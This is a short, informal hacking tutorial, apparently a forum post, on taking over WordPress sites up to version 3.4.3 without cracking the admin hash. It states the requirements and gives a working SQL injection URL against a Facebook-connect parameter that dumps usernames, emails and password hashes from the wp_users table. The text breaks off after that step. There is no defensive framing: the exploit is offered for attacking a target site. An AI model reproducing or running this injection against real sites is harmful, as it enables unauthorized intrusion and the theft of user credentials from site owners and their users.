How to Hack a Wordpress Site V=3.4.3
only on wordpress <= 3.4.3
Ok so u have a wordpress hash which is uncrackable or you are too lazy to try.
Here Is a method you can use to hack it without cracking the hash.
Requirments:
*. Sqli Vulnerable Wp Site
*. WP version <= 3.4.3
k lets assume we have an sqli on this site
http://target.com/?fbconnect_action=myhome&fbuserid=1 and we have
injected it with the following and could see the email id, username
& password
http://target.com/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_email,0x3a,user_pass)%E2%80%8B,7,8,9,10,11,12+from+wp_users--
k...
